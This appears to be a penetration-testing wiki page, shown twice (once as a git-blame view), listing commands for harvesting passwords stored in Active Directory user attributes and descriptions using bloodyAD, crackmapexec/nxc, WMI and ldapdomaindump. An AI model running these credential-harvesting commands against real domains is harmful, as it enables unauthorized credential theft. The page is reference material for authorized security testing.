InternalAllTheThings/docs/active-directory/pwd-comments.md

# Password - AD User Comment

There are 3-4 fields that seem to be common in most Active Directory schemas: `UserPassword`, `UnixUserPassword`, `unicodePwd` and `msSFU30Password`.

* Windows/Linux command
    ```ps1
    bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 get search --filter '(|(userPassword=*)(unixUserPassword=*)(unicodePassword=*)(description=*))' --attr userPassword,unixUserPassword,unicodePwd,description
    ```

* Password in User Description
    ```powershell
    crackmapexec ldap domain.lab -u 'username' -p 'password' -M user-desc
    crackmapexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 -M get-desc-users
    GET-DESC... 10.0.2.11       389    dc01    [+] Found following users: 
    GET-DESC... 10.0.2.11       389    dc01    User: Guest description: Built-in account for guest access to the computer/domain
    GET-DESC... 10.0.2.11       389    dc01    User: krbtgt description: Key Distribution Center Service Account
    ```

* Get `unixUserPassword` attribute from all users in ldap
    ```ps1
    nxc ldap 10.10.10.10 -u user -p pass -M get-unixUserPassword -M getUserPassword
    ```

* Native Powershell command
    ```powershell
    Get-WmiObject -Class Win32_UserAccount -Filter "Domain='COMPANYDOMAIN' AND Disabled='False'" | Select Name, Domain, Status, LocalAccount, AccountType, Lockout, PasswordRequired,PasswordChangeable, Description, SID
    ```

* Dump the Active Directory and `grep` the content.
    ```powershell
    ldapdomaindump -u 'DOMAIN\john' -p MyP@ssW0rd 10.10.10.10 -o ~/Documents/AD_DUMP/
    ```
AD - Pages v0.1 2023-12-03 11:17:02 +00:00			`# Password - AD User Comment`

Attack Surface Reduction + Azure Subscription 2023-12-19 16:58:13 +00:00			There are 3-4 fields that seem to be common in most Active Directory schemas: `UserPassword`, `UnixUserPassword`, `unicodePwd` and `msSFU30Password`.
AD - Pages v0.1 2023-12-03 11:17:02 +00:00
Add bloodyAD cmd and fix syntax 2024-01-11 15:58:09 +00:00			`* Windows/Linux command`
			```ps1
			`bloodyAD -u user -p 'totoTOTOtoto1234' -d crash.lab --host 10.100.10.5 get search --filter '(\|(userPassword=)(unixUserPassword=)(unicodePassword=)(description=*))' --attr userPassword,unixUserPassword,unicodePwd,description`
			```

Attack Surface Reduction + Azure Subscription 2023-12-19 16:58:13 +00:00			`* Password in User Description`
			```powershell
			`crackmapexec ldap domain.lab -u 'username' -p 'password' -M user-desc`
			`crackmapexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 -M get-desc-users`
			`GET-DESC... 10.0.2.11 389 dc01 [+] Found following users:`
			`GET-DESC... 10.0.2.11 389 dc01 User: Guest description: Built-in account for guest access to the computer/domain`
			`GET-DESC... 10.0.2.11 389 dc01 User: krbtgt description: Key Distribution Center Service Account`
			```
AD - Pages v0.1 2023-12-03 11:17:02 +00:00
Attack Surface Reduction + Azure Subscription 2023-12-19 16:58:13 +00:00			* Get `unixUserPassword` attribute from all users in ldap
			```ps1
			`nxc ldap 10.10.10.10 -u user -p pass -M get-unixUserPassword -M getUserPassword`
			```
AD - Pages v0.1 2023-12-03 11:17:02 +00:00
Attack Surface Reduction + Azure Subscription 2023-12-19 16:58:13 +00:00			`* Native Powershell command`
			```powershell
			`Get-WmiObject -Class Win32_UserAccount -Filter "Domain='COMPANYDOMAIN' AND Disabled='False'" \| Select Name, Domain, Status, LocalAccount, AccountType, Lockout, PasswordRequired,PasswordChangeable, Description, SID`
			```
AD - Pages v0.1 2023-12-03 11:17:02 +00:00
Attack Surface Reduction + Azure Subscription 2023-12-19 16:58:13 +00:00			* Dump the Active Directory and `grep` the content.
			```powershell
			`ldapdomaindump -u 'DOMAIN\john' -p MyP@ssW0rd 10.10.10.10 -o ~/Documents/AD_DUMP/`
			```